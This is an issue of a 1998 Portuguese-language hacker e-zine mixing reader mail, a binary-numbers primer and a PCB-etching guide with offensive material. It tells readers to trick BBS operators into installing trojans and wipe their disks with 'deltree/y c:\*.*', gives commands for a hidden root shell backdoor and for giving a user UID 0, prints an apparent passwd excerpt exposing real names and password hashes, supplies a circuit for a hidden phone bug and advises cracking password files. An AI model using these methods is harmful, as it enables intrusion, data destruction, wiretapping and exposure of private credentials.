-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 04 - BACKDOORS -=-=-=-=-=-=-=-=-=- - Backdoor em Q-A Facam um programinha ou um questionario bem legalzinho em q-a. E de um jeito de fazer com q o sysop burrinho instale ele na bbz. Se o cara for bem idiota, ele nem vai olhar o codigo do q-a. O arq com os comandos q-a estao na hp da hack n' phreak. - Backdoor por infectacao de arqs Peguem algum DSZ infectado ou arrumem em alguma bbz um trojan maker para ra. Com eles vcs podem arrumar acesso de sysop. Eh so mandar para o sysop como no item acima. Pronto. Agora vc ja tem o acesso de sysop na bbz. E agora? vc ja pegou todos os arqs interessantes da bbz? Vamos fude-la agora. Va ao menu de msgs e mande uma msg para vc mesmo e com o corpo da msg com comandos DOS (algo tipo: deltree/y c:\*.*). Agora, va ao menu novamente e leia sua msg. Vc vai perceber algumas opcoes a mais (ja q vc esta com nivel de sysop). Vc nao vai usar todas elas, somente a opcao X (export). Nela vc pode "exportar" o texto da msg para qualquer arq do hd do cara! Mande entao exportar sua msg para o autoexec do cara! Pronto, agora a bbz escrota nao existe mais. Vc ja deve ter acessado alguma bbz q use o wgm. Aquelas bbz fraquinhas onde os lamahs acessam por modo grafico no ruindows e podem acessar inet. Bom... esse WGM eh bem seguro e muito dificil de se entrar. A unica vez q eu consegui entrar foi descobrindo o passwd do sysop. Mas ha uma luz no fim do tunel! Apesar da seguranca, essas bbz tem uma falha: O sysop. Ta... e como explorer esse BUG??? Nessas bbz, eh possivel serem confecionados aplicativos em VB3. Olha ai a nossa salvacao! O problema eh q eu ainda nao tenho a listas dos arqs ou os VBXs q se devem usar para fazer esses programas.=20 Contudo, peco a vcs, que deem um jeito de arrumar o WGM SERVER. Com isso, vamos poder descobrir os segredos dessa "falha". Quem tiver a possibilidade, mande para nos! Vamos ter o prazer de distribuir os Backdoorz feitos para o WGM. 1998, ShK - HackPHR Zine -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 05 - COMPLEMENTANDO OS NUMEROS BINARIOS -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Computadores pessoais como os baseados nos microprocessadores Intel 8088 e 80286 (MUSEU :-), sao PCs de 16bits. Isto significa que podem trabalhar com numeros binarios de ate 16 casas ou bits, o que, traduzido para numeros deci- mais equivale a 65.536. Se a opreracao exigir um numero superior a esse, o PC precisa, em primeiro lugar, quebrar esses numeros em componentes menores, realizar a operacao em cada componente e entao recombinar os resultados em uma unica resposta. Os PCs mais comuns, baseados nos microprocessadores Intel 80386 e 80486, sao computadores de 32bits, ou seja, podem manipular numeros binarios com ate 32bits - o equivalente a notacao decimal 4.294.967.296. A habilidade em trabalhar com ate 32bits por vez torna esses PCs mais rapidos do que os de 16bits. Numero Decimal Numero Binario 0 0 1 1 <----- Note que como a sequencia vai mudando 2 10 a cada quatro numeros binarios e vai 3 11 repetindo os numeros apos isso... soh 4 100 se bota o numero 1 na frente de todos. 5 101 6 110 7 111 8 1000 9 1001 10 1010 11 1011 12 1100 13 1101.......... Os transistores nao sao utilizados somente para gravar e manipular nume- ros. Os bits podem tambem, significar verdadeiro (1) ou nao verdadeiro (0). As combinacoes dos transistores em varias configuracoes recebem o nome de portas logicas, quando estao dispostas em arranjos (arrays) sao chamadas de half-adders (somando parciais), que por sua vez sao combinadas em full-adders (somadores completos). Mais de 260 transistores sao necessarios para criar um somador completo (full-adder) que possa gerenciar operacoes matematicas para numeros de 16bits. Alem disso, os transistores tornam possivel que uma pequena quantidade de corrente eletrica controle outra corrente mais forte - do mesmo modo que a pequena quantidade de energia necessaria para acionar um interruptor de parede pode controlar a energia mais potente que vem atraves dos fios ate a lampada. 1998, HaCk-MaN - HackPHR Zine -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 06 - BACKDOOR SH: by GhOsT InVaDeR -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Seguinte, eu nao acho que backdoor (porta dos fundos ) seja a melhor maneira de definir esta "tatica" que irei falar, mas tb nao ah outra melhor. Bom, o maior desafio de um hacker eh conseguir pegar root em um sistema e poder fazer simplesmente ALL. Mas da ateh pena em saber que depois voce nao podera voltar e conseguir o acesso root novamente a nao ser que voce instale uma boa backdoor. Todos sabemos que cada usuario tem uma shell no sistema Unix ou Linux, ate mesmo o root. Muitas pessoas que frequentam o irc pensam que shell e apenas uma conta que da acesso a telnet. Resumidamente pode ate ser isso, mas vai muito alem desta definicao o poder da shell. O arquivo shell fica a maioria das vezes no diretorio /bin/sh e define o UID, GID, etc do usuario. Ex: Voce conecta com um login= james senha=banana. Entao automaticamente a shell do usuario eh executada e o sistema identifica o ID do usuario e que tipo de acesso e permissao ele tem. Digamos entao que eu quero saber o id deste usuario. Entao eu digito id $ ID james UID=10156 GID=4 bla bla bla bla bla bla bla Putz, com esse id ele nao pode acessar quase nada no sistema. (Lembrando que quanto maior o UID menor sao suas permissoes no sistema) Agora digamos que voce conecta como root. O esquema eh o mesmo, o sistema executa o /bin/sh e identifica qual seu acesso e que permissao ele tem. No caso, total. Mas digamos que voce deseja conferir o id. Entao digite no prompt: $ ID root UID=0 GID=0 bla bla bla bla bla bla bla Ai voce pensa: __Ahhhh, o esquema ta todo naquele arquivo sh que fica no /etc. Isso mesmo. Agora, o que isso tem a ver com backdoor?? Bom, supondo que voce esteja com acesso root, siga esses passos: 1) Escolha um diretorio nao suspeito ou crie um subdir. 2) Copie o /bin/sh pra dentro dele obs: de preferencia oculto, salve com o ponto na frente .sh 3) Agora de permissao a ele para que qualquer usuario possa executa-lo use: chmod 777 .sh 4) Pegue o /etc/passwd (voce tambem pode criar um usuario com shell no sistem a, mas eh muito arriscado) 5) Saia do sistema e desencripte o passwd. 6) Escolha um usuario qualquer que tenha shell e volte no sistema 7) Execute o .sh que voce copiou e bingo!! voce tem id de root 8) Digite ID para conferir seu uid. Simples mas eficaz. Ahh, voce nao entendeu? entao vou passar o que fazer em comandos: COMO ROOT FACA: $ cp /bin/sh /tmp/.sh $ chmod 777 /tmp/.sh $ cat /etc/passwd (ou crie um usuario: adduser login_cara) $ logout desencripte uma senha ou entre com a conta que voce criou. COMO USER COMUM FAA: $ ID james UID=10156 GID=4 bla bla bla bla bla bla bla $ cd /tmp $.sh $ ID root UID=0 GID=0 bla bla bla bla bla bla bla BINGO!! Agora voce tem o id de root. Ah outra forma de usar o UID e GID. Digamos que o provedor que voce esteja eh bem grande e contem uma vasta lista de usuarios que contem shells em seu passwd. Agora fica facil, basta editar o /etc/passwd e mudar o UID e GID de algum usuario para 0. Obs: Nao esqueca que esse metodo eh arriscado, e que se o usuario que voce escolheu mudar a senha voce nao podera voltar mais. Obs2: Confira se nao ha um backup do passwd, geralmente -passwd, passwd-, .passwd etc... Vou supor que la tenha o editor pico: $ PICO /etc/passwd ______mude aqui | | pparo:CMjZikulXQqK.:0:0:PAULA DORNHOFER PARO:/home/EE97/pparo:/etc/sh goroh:grwta/Jaq5vpg:10272:1011:Andre de Oliveira Fernandes - 900160:/home/EC90/goroh:/bin/csh teixeira:bNTBqVVSd5zCI:10495:1011:Gustavo F. Teixeira:/home/EE93/teixeira:/bin/csh rodolfon:0AzVjyyD40TFU:10177:1011:Rodolfo Jose Leite Netto:/home/EE92/rodolfon:/bin/csh isa9000:yOs699b9JJ4I6:10632:1011:Isabella Sousa Carreira:/home/EE93/isa9000:/bin/csh daniloa:sfsS0gQr.J.zM:9399:1011:DANILO ANGELO - 950424:/home/EC95/daniloa:/bin/csh alcaraz:QswOnrLt/sn62:10209:1011:Carlos Alberto Duarte Alcaraz:/home/EE92/alcaraz:/bin/csh pinho:GHV/.J8MdGdBU:10256:1011:Fernando Correa de Araujo Pinho:/home/EC91/pinho:/bin/csh hideo:lLt//EJT7klnE:10186:1011:Edson H. Fujishima - 930187:/home/EE93/hideo:/bin/csh tatiana:zCr9VVfVXDLpM:10750:1011:Tatiana Steckelberg Iwashima:/home/EC93/tatiana:/bin/csh mauric0:rPmUtvNcTtZt2:10190:1011:Mauricio Dester:/home/EE87/mauric0:/bin/csh :aperte ctrl + x pra sair e salve quando solicitado. $ logout agora volte com o login e a senha deste usuario que voce alterou o id que voce ja entra com ID 0 (acesso total) GhOsT InVaDeR (ghostin@freemail.globalsite.com.br) 1998, GhOsT InVaDeR - HackPHR Zine -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 07 - PLACAS DE CIRCUITO IMPRESSO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Bom, o q me levou a escrever essa materia foi o fato de q eu ja to cansado de ficar falando sobre boxes sem dar o projeto de uma BOX interessante, pen- sando nisso, resolvi passar nesta ediao, uma box q transmite as conversas telefonicas. Eh uma placa pequena, q vc deixa dentro do fone, eh isso mesmo, dentro do fone!!! Mas tem aqueles q nunca tiveram um contato aprofundado com a eletronica, entao, pensando nessas pessoas q eu vou escrever isso aki. Ninguem precisa saber o q um capacitor de 100uF faz para montar esses pe- quenos projetos, basta seguir todas as indicaoes do diagrama e montar adequa- damente para ele funcionar, mas para a placa ficar melhor ainda, eu sugiro q vc treine um pouco sua habilidade de soldar, pois alem de seu trabalho ficar melhor, a box q ensino, eh muito pequena, e uma solda mal-feita pode danificar todo o circuito, pra comeo de conversa vc vai precisar de: - Um soldador (aquele ferro q esquenta) - Solda (aquele ferro mole q vem enrolado) Isso eh essencial para vc comear uma pequena soldagem. Eh logico q vc tmb vai precisar de alguma coisa pra soldar, pegue uns fios velhos para praticar. Pronto, coloque o soldador na tomada e espere esquentar. Depois de um tempo ele vai estar bem quente (cuidado pra nao fazer uma tatuagem) pegue a solda e aproxime do local a ser soldado, entao com a ponta do soldador, encoste na solda, para q ela derreta e entre em contato com o local desejado, no nosso caso, onde os fios se unem. Ok, vc precisa de um diagrama: Soldador - \\ / - Solda \\ / \\ / =========----*----============ - fios | Solda feita Ahm, eu sei o diagrama ficou uma merda e nao ajudou em nada, pelo menos ocupa um espacinho, hehehe... Bom, voltando a aula, nao deixe a solda pingar na mesa ou em vc, ela eh quente tmb. Ela seca rapido em questao de segundos. Para a soldagem de componentes na placa, o esquema eh o mesmo, vc poe os terminais do componente nos seus devidos buracos e solda, o que sobrar vc cor- ta fora, nao puxe a perninha fora, corte com um alicate de corte... Soh um lembrete: Na hora de soldar o componente, nao solde fora da trilha nem apenas o terminal, solde de uma maneira em q o terminal fique bem conecta- do a trilha. Sobre soldagem eh soh isso, nao eh nada teorico, precisa de pratica... Vamos a parte da confecao da placa: OBS.: Muito cuidado ao usar o ferro, lembre-se q ele se aquece em temperaturas acima dos 300 graus Celsius CONFECCIONANDO A PLACA DE CIRCUITO IMPRESSO Antes de tudo vc precisa comprar a placa, ela tem um dos lados cobreados e pode ser encontrada facilmente em casas de eletronicos, peca um tamanho ade- quado para a montagem q vc vai realizar. Agora o nosso proximo passo eh fazer as trilhas para a eletricidade passar por onde ela deve. Vc pode ver em qualquer livro ou revista como ela eh, vou tentar fazer um diagrama, mas eh ruim: Placa de Circuito Impresso: ______________________ | | OBS.: Pra ninguem vim me perguntando o q essa | o----\ o o o o | placa faz: Ela eh soh um EXEMPLO, nao faz | o--\ | | | nada, tanto q estah incompleta... | | \----o o o o | | \---o | | | | o----/ | | | o------/ | |______________________| Onde: o = buraco onde passa o terminal do componente (Ilha) / = curva \ = curva -- = trilha Bom, em varios lugares existem uns decalques pra vender para fazer as pla- cas, no meu caso, eu uso um metodo mais simples: Tiro um xerox ou desenho a placa no tamanho original (que ela devera sair) e com um estilete, corto as trilas (do papel, eh claro) para q fique um molde, entao coloco em cima da parte cobreada da placa, fixo com durex se necessario, e passo o esmalte... Esse eh um metodo q eu utilizo, se vc quiser utilizar um outro problema seu Bom, vamos comear entao. Quando vc tiver em maos a chapa cobreado, serre-a de acordo com suas necessidades, depois de um jeito nela para q fique bem brilhan te, passe um bombril, ou coisa assim. Depois q ela tiver bem bonitona, tenha em maos o molde, ou o decalque, ou a merda q vc vai usar pra marcar as trilhas Eu recomento q vc marque os locais onde vc tem q fazer o furo, fica mais facil depois. Entao passe o esmalte, ou o decalque, depois de a placa ter suas tri- lhas marcadas, vc pode preparar o pecloreto para deixar ela lah. Faa isso: Compre um pote de Percloreto de Ferro, ou po de percloreto, e dissolva em agua, dissolva na quantidade de agua q ta marcada na embalagem do po. Dissolva numa bacia, ou outro lugar para colocar a placa. Nao se preocupe se colocar percloreto demais, ele pode ser usado novamente. Depois q vc colocar o po vai ocorrer uma reaao quimica, cuidado pra nao respirar o vapor q vai sair de lah, pois eh toxico, e faa isso ao ar livre, nao deixe nenhum material meta- lico entrar em contato com o vapor, para evitar a corrosao. Depois q vc fez a mistura, coloque a placa lah dentro, se quiser amarre um fiozinho, eh mais facil de tirar depois. Para dissolver mais rapido, fique balanando a bacia, ou puxe o fio pra lah e pra cah... Deixe lah ate q o cobre saia todo, ficando apenas as partes q vc marcou, seja com o decalque ou com o metodo q vc usou. Nao boie, nao deixe a placa por muito tempo, senao jah era o seu projeto. Nao estranhe se quando vc tirar a placa ficar meia rosada. Depois vc pode lava-la com agua e guardar o perclore- to num pote qualquer, desde q esteja bem protegido. Depois de lavar a placa, vc pode tirar o decalque com bombril, ou se vc usou esmalte, tire com um algo- dao e acetona. Agora soh falta furar a placa e pronto... Na hora de furar, faa o furo ideal, nao muito largo, o essencial pro terminal passar... Aih estah sua placa de circuito impresso... OBS.: Guarde a sobre do percloreto num recipiente PLASTICO, pois ele eh alta- mente corrosivo ao metal 1998, MaNdRaCk - HackPHR Zine -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 08 - BOX - TRANSMISSOR FM OCULTO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Ai estah um projeto de uma box para linhas NACIONAIS, q transmite conversas telefonicas em FM. Daih vc pergunta, o e q tem de tao incomun nisso? Incomum eu nao diria, eu diria interessante. Essa maravilha opera na faixa dos 60 a 100 Mhz, transmitindo todas as conversas num raio de + ou - uns 40 m. E o melhor de tudo, ela vai escondida dentro do telefone... E tem mais, nao precisa de pilhas, eh alimentada pela propria linha telefo- nica!! Ohh. A unica desvantagem desse circuito eh q a placa de circuito impresso tem q ser pequena o bastante para entrar dentro do fone, nos padroes, vc podera fa- ze-la no maximo com 2,3 cm de largura, portanto, se vc nao tem muita pratica na soldagem e confecao de placas de circuito impresso, nem tente fazer esse projeto, senao eh um desastre na certa... Outra desvantagem eh q o som do telefone "boxeado" fica mais baixo, mas nada q interrompa o processo. A instalaao do aparelho eh outra vantagem, vc precisa apenas abrir o fone, aquele q vai em cima do gancho, e prender os jacares nos terminais, sem precisar observar a polarizaao... MATERIAL NECESSARIO: Q1 - BF494 - transistor NPN de RF D1, D2, D3, D4 - 1N4148 - diodo de uso geral (1/8 W, 5%) R1 - 1K ohm R2 - 1,2 K ohms C1, C3 - 1 nF - ceramico C2 - 10 pF - ceramico L1 - bobina pequena DIAGRAMA: 1k o-------|||||------ |----------- ------o--------- jacare 1 | | | / | | | | | \ |C2 | /o\ | |---o ---10pF | D1 D2 | \ --- | ----o o------o L1 / | | | D3 D4 | \ | | | \o/ | | | / | | | o-------------|/ Q1 | | ___ |\ BF494 | | ___ C1 \ o-------------------- | 1 nF | jacare 2 | | | | | ----------------o | | | | | | ___ == R2 | | ___ C3 == 1K | | | 1 nF | -----------------o---------------o---------------- o = ligaoes O diagrama tah meio complicado mas eu acho q dah pra entender. Nao vai dar pra fazer a placa de circuito impresso em ASCII, se vc tiver mais experiencia vai conseguir fazer uma naboah, mas se vc eh inexperiente, aguarde q eu colo- co um GIF na home page do PHR pra Download. Se vc tiver acesso a componentes SMD eh melhor ainda, a placa fica bem menor, mas se vc nao tiver, dah pra construir tranquilo assim. L1 eh a bobina. Para fazer a bobina escolha um fio esmaltado 26 a 28, com diametro de uns 5 mm. Para faixas em FM faa com 2+2 espiras. As saidas podem ser feitas com fios de uns 10 cm, com jacares, ou ou- tra coisa q prenda bem, para nao causar nenhuma interferencia na transmissao ou mesmo pra nao se soltar com o balano do fone, principalmente se alguem deixar cair no chao. Para testalo, pode testar em seu telefone, ou com tres pilhas (4.5 V). Pegue o receptor q vc vai usar, pode ser um radio portatil co- mum e ajuste numa frequencia entre 60 e 100 Mhz. Fique apertando e soltanto as espiras para ajustar a frequencia, enquanto tenta achar com o receptor. Depois de achar a frequencia certa, cuide para nao mexer a bobina, e marque em um pa- pel ou coisa assim. Depois eh soh instalar no telefone q quiser, e abracadabra pronto, lembre-se q ele vai transmitir sempre q o fone for tirado do gancho. 1998, MaNdRaCk - HackPHR Zine -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 09 - SHADOW PASSWD -=-=-=-=-=-=-=-=-=-=-=- Bom... o que vou falar e sobre uma coisa muito lamer e que todos DEVERIAM saber..... SHADOW! Aparece cada um com uns arquivos falando que tem as senhas e que e hacker... o arquivo de senhas (geralmente chamado de passwd) e assim: login:senha:id:uid:comentario:command.com Quando voce acha um arquivo que tenha no lugar da senha um monte de LETRAS, voce teve muita sorte! Ou o provedor uma droga ou voce pego um root muito lamer! Ficaria mais ou menos assim um arquivo SEM shadow: root:N48dydkljSf3:0:0::/bin/sh Bem... se voce arranjou alguma coisa assim.. procure um desencriptador LOGO! Uns do que eu conheco e: Cracker Jack 1.4 (Windows), Jhuck (Windows) e mais uns que eu nunca vi funcionar direito! Pra conseguir eles... e so andar um pouco pelas HP's hackers por ai! Mais caso voce tenha achado um arquivo passwd da seguinte forma: root:*:0:0::/bin/sh root:!:0:0::/bin/sh (Uma dessas formas, existem varias... essas sao comuns) root:X:0:0::/bin/sh Se voce achou um arquivo com essas formas acima mais tem acesso nesse provedor por telnet... ai a coisa muda! Tem um monte de geito de "tirar" o shadow dos arquivos... e so ter vontade de procurar que voce acha por ai! Um muito simples que funciona mais ou menos bem e o UNSHAD. Voce encontra ele por ai em qualquer lugar! Aqui tem uma cpia em C. Voc deve usar o compilador c(cc) do Unix para compilar o unshad e usa-lo digitando unshad >> arquivo_senhas. cc -o unshad unshad.c unshad >> senhas.dat No caso, as senhas encontradas sero armazenadas no arquivo senhas.dat --------------------------------UNSHAD.C--------------------------------- #include main () { struct passwd *p; while(p=getpwent ()) printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd, p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell); } ---------------------------------------------------------------------- Mais e se voce nao tem acesso por telnet? Bom, com sorte voce acha um arquivo passwd que tenha UM login com a senha unshadow. Desencripte ela e logue por telnet! Geralmente as senhas usadas em log por FTP tem acesso em TELNET tambem! Ai e fazer a festa! Como esse assunto e muito lamer mais muitas pessoas nao sacam isso... paro por aqui! Se a galera ajudar ae... continuamos no proximo zine com coisas mais interessantes!!!! 1998, SideW - HackPHR Zine -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 10 - CORREIO DA GALERA -=-=-=-=-=-=-=-=-=-=-=-=-=- Aki estao alguns mails q recebi com o passar do tempo. Alguns eu jah respondi antes, por e-mail, mas nao deu pra responder todos, portanto veja a resposta agora... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Bom, de novo , o mesmo merda de internauta volta a te ecrever, novamente te pedidno ajuda. O que eu queria saber e pra que servem as green boxes ?? Quais sao sua finalidades ?/ Estou te escrevendo isso pq eu arrumei um programa , como um nome babaca, chamdo phreakzoid, esse programa tem a capacidade de imitar atrves de sons a Silver, Red, Blue e a Green box. Li na sua zine sobre todas , menos a green !! Sera que da para dar um ajudinha ?? Velue !!! Se vc quiser este programa e so pedir !!! Muito agradecido. obs: Eu tb arrumei um outro programa chamdo boxtone, mas eu ainda nao consegui descobrir a sua finalidade !!! Gostaria de saber se posso tomar a liberdade de te mandar este porgram, sao apenas 6 kb ! Para vc assim descobrir a sua funcao !! RESPOSTA: Todas essas boxes q vc se refere nao funcionam aki no Brasil, portanto, jah q vc eh begginer, comece estudando apenas as boxes q funcionam aki no Brasil, o programa BoxTone, provavelmente eh um gerador de sons em varias frequencias, parecido com o BB q eu fiz, e estah na Home Page do zine. Mas pra nao dizer q nao respondi sua pergunta, a Green Box cria tres tons diferentes, o tom de COIN CO- LLECT, o de COIN RETURN, e o de RINGBACK... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- olah... desculpe a invasao... serah que vc poderia me mandar textos sobre PGP??? tipo... o que eh.. como usar... etc.... sou totalmente leiga no assunto.. porem tenho grande vontade em saber... agradeco... e aguardo noticias []s RESPOSTA: Pode aguardar a ediao 04 q o Cebola vai fazer um tutorial sobre o PGP ok? -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Cara, achei legal o seu zine, contem informaes uteis e certas dificil achar na internet textos assim sou programador C , e gostei da seo sobre virus, etc. Daniel. RESPOSTA: Ok, mas vc tem q agradecer ao Cebola e nao a mim, vcz devem mandar criticas e sugestoes das materias de seus respectivos autores... O mail do Cebola eh: cebola_br@hotmail.com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Se vc quiser por um link da sua pgina na minha mande o endereo da sua e se vc tiver o logo mande junto... http://www.terravista.ciclone.com.br/areiasbrancas/1365/index.html RESPOSTA: Eh logico, pode por quantos linkz quiser... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Primeiro, parabns pela Zine. 10. .... Eu queria saber uma coisa, qual o endereo do arquivo, especificadamente, que eu nao achei nada lah. E tb, como eu posso downloadar esse SO via NET se eu vi pra vender em dois CDs ? RESPOSTA: Sim, o Linux eh vendido completo em CD, mas se vc nao quiser comprar o CD pode pegar de graa em varios endereos, eh soh procurar: http://www.sunsite.unc.edu ftp://ftp.cdrom.com/pub/linux -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ae, eu sou um leitor de seu zine, que por sinal otimo e gostaria de saber se vc tem endereos de mais zines valeu ae beakman RESPOSTA: Na HP do PHR tem tudo q eh zine... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- A a, bele? Cara eu tenho lido seu zine, achei 10 , mas tenho tido uns proble- minhas quanto as dicas phreak. Posso me considerar um hacker de certa experi- ncia, mas nuca me interessei por phreak. Agora v que tambm muito loco. Minha zica com o lance dos cartes telefnicos. No consegui fazer funcionar nada daquilo que vc indicou. Segui os passos e no deu nada certo. Ser que vc pode dar um help? Valeu, meu nick Cable Guy. RESPOSTA: Poize, hehehe, aquelas merda nao funcionam mezmo... Mas pode crer cara, na proxima ediao (04 - Maro) vou colocar uma materia com as voltagens dos telefones a cartao, aguarde... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- olah... como faco para conseguir as versoes anteriores do "Manual de Violao a Telefones Pblicos e Privados " ?????? obrigada RESPOSTA: Vc soh digita no Cade? Vai aparecer, mas eu nao recomendo as versoes anteriores, a unica diferena sao correoes, e tem as mesmas coisas das mais novas, algumas a menos, se vc tem a mais nova nao precisa da mais velha, eh igual... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Cara, Adorei o seu e-zine, e D +. Para mim que estou comecando agora (como vcs dizem sou um begginer), e' otimo. Mas voltando ao assunto do sbject, eu queria dar um toque em vcs: e sobre os americanos. Americanos somos todos nos que nascemos no continente chamado America. Os bundoes que nascem no pais Estados Unidos, sao ESTADUNIENSES. Claro que, eles tb sao americanos, mas nao tao quanto nos. Eles sao tao arrogantes que se intitularam como donos da America ate no nome. E cara, aproveitando a deixa, vc poderia me ajudar em uma coisa: Eu chequei num arquivo passwd de 55k, mas nao consigo copia-lo. Eu do o comando mas so chega o arquivo com 0k. como eu contorno isso? REPOSTA: Humm, tens razao, os Americ... opz, os Estadunienses sao uns bundoes. Mas vc deve notar q quando falo Americanos, nao me refiro aos Sul- Americanos, e sim aos Norte-Americanos. Quanto ao seu problema de Download do passwd, eh o seguinte: Provavelmente vc usa o prog FTP do Linux ou do Win95. Acontece que quando vc dah o comando "get passwd" ele nao vai verificar se o ar- quivo existe ou nao e falar pra vc, ele soh vai tentar copiar dire- to, portanto se ele nao existir ele vem com 0k. O q deve ter de erra- do eh q vc nao estah digitando certo, ou estah digitando em MAIUSCU- LAS, um erro q nunca deve ser cometido no UNIX, ou simplesmente vc nao estah indo no diretorio correto, que seria /etc. Para conferir o dir. atual de um "pwd"... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- carai, manow... ia teu zine ta phods, arretado msmo... mas como p/ toda regra existe uma excecao, tenho de comentar algumas coisas: mermao, p/ que usa tantos sinais? sempre que faco o download e abro aparece com um monte de caracteres especiais que sinceramente dificultam um pouco a leitura de materias mais tecnicas... a rea phreack tambem precisa ser rearranjada, colocar mais material, coisas mais materias tecnicas a respeito da telefonia brasileira e nao o carai da americana... a rea anarchy, sem comentarios, nao curto esse negocio de mini-terrorismo, mas nada contra... a virii zone ta muito boa, o editor realmente merece os creditos... so uma coisa: nos proximos numeros, jah que a revista eh direcionada turma iniciante, coloca algumas materias a respeito de interesse geral da galera, tipo descricao das operacoes basicas de funcionamento de alguns programas, como o pgp, por exemplo... ok manow? po vei, valew pela atencao e espero que corra tudo bem por ai, manow... OUTof|ORDER RESPOSTA: Como eu ja disse, isso eh pro EDIT do MS-DOZ, nao pro MicroBost Word 8.0000 R$: soh 999,99. Sobre a telefonia Brasileira, tem uma box nessa ediao e na outra vai ter as voltagens dos telefones a cartao. Sobre o PGP, o Cebola vai fazer um tutorial pra proxima ediao... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Ola... estou mandando este E-MAIL para lhes pedir um favor... Eu no poderei assesar Internet por um tempo apenas E-MAIL e gostaria de saber se vcs. poderiam mandar os arquivos sobre PRHECK e as bovas edicoes que viram a ser feitas do Hack and Phreak... Obridado pela atenc~zao maito:????@???????.???.?? *As edicoes 0 e 1 eu ja tenho e dou-lhes os parabens por elas RESPOSTA: Serio? Eu tmb nao vou poder, vc poderia autalizar minha HP, escre- ver materias pro zine, responder os mail, e se vc cozinha bem, po- deria fazer meu almoo? Acha q sou quem cara? Suporte tecnico da MicroSoft? -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- E aC ! Eu sou Rafael, um beginner, gostaria de saber como faGo para acessar o banco de dados do computador central de um pequeno provedor (para ter acesso as contas, poder alterA-las, abrir novas contas, etc...) Ficaria muito grato se vc me respondesse, o meu e-mail I: RESPOSTAS: Hamm, proxima pergunta... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Eu achei demais a zine de vocs! Eu que sou um iniciante na area hacker e aumentei muito o meu conhecimento no assunto depois de ter lido as 3 zines j feitas, uma aprendizagem facil e, finalmente, alguem que respeita os iniciantes e faz uma oposiao aos lamers... Vocs deveriam colocar mais assuntos hackers e continuar sem aquela trolha de comandos a baboseiras que as TRADICIONAIS costumam fazer. Gostaria de saber como se faz aquele cavalo de troia da zine dois... Eu gostaria de fazer algo pela zine mas eu sou um perdido na area hacker( como eu ja disse ainda estou caminhando...), mas tem o tema anarquia que eu nao entendo o que tem de anarquico nisso...Sei sobre a anarquia e outras cossitas mas.... Valeu e continuem assim! PS: eu nao tenho qbasic, onde eu consigo e como se abre arquivos nele...Bem coisa de begginer... MORRAM LAMERS! RESPOSTA: QUALQUER pergunta direcionada a programaao perguntem ao Cebola, mandem mails pra ele. cebola_br@hotmail.com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Fala Mandrack! Gostei muito do zine, estou aprendendo muito com ele. Tambem gostaria de dizer que posso ajudar com a pagina do zine, qqr coisa s falar, ok? =^) Tenho uma nova home page em http://www.theoffice.net/flaviosr mas ainda esta em construcao... RESPOSTA: Muito legal mesmo saber q vcz aprendem e dao valor ao zine, ao con- trario de muitos q vivem do deboche. Se quiser ajudar com o HP, nos estamos precisando, entre em contato com a gente... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Ae galera do Hacker n' Pheaker..blz?? Recebi esses Zines e adorei! So de mais!! Eu ja li muito Zine...mas muito mesmo!! E o Zine que achei mais legal ta sendo este! Principalmente a parte Virii...que esta sendo escrita pelo Cebola... Ele explica muito bem!1 Valeu mesmo galera E vamo ver se num deixa esse Zine morrer como 